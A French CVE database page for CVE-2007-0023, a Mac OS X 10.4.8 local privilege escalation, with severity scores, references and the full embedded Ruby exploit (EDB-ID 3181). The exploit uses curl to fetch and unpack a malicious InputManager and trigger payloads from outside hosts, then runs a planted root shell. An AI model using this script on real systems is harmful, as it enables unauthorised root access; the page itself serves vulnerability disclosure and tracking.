CVE-2007-0023 : Détail

CVE-2007-0023

0.22%V4
Local
2007-01-24
00h00 +00:00
2017-07-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The CFUserNotificationSendRequest function in UserNotificationCenter.app in Apple Mac OS X 10.4.8, when used in combination with diskutil, allows local users to gain privileges via a malicious InputManager in Library/InputManagers in a user's home directory, which is executed when Cocoa applications attempt to notify the user.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.9 AV:L/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3181

Date de publication : 2007-01-22 23h00 +00:00
Auteur : MoAB
EDB Vérifié : Yes

#!/usr/bin/ruby # Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com> # Lance M. Havok <lmh [at] info-pull.com> # All pwnage reserved. # # "Exploit" for MOAB-22-01-2007: All your crash are belong to us. # require 'fileutils' bugselected = (ARGV[0] || 0).to_i # INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz" # keeping a local backup. /str0ke INPUTMANAGER_URL = "https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3181.tar.gz" INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" + "mkdir -p ~/Library/InputManagers/;" + "cd ~/Library/InputManagers/;" + "tar -zxvf /tmp/moab_im.tar.gz" case bugselected when 0 target_url = "http://projects.info-pull.com/moab/bug-files/notification" trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &" when 1 target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf" trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf" when 2 target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz" trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg" end CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}" def escalate() puts "++ Welcome to Pwndertino..." system CMD_LINE sleep 5 system "/Users/Shared/shX" end escalate() # milw0rm.com [2007-01-23]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4.8

Références

http://www.osvdb.org/32695
Tags : vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA07-047A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/24198
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1017542
Tags : vdb-entry, x_refsource_SECTRACK
http://www.kb.cert.org/vuls/id/315856
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/23846
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2007/0074
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/22188
Tags : vdb-entry, x_refsource_BID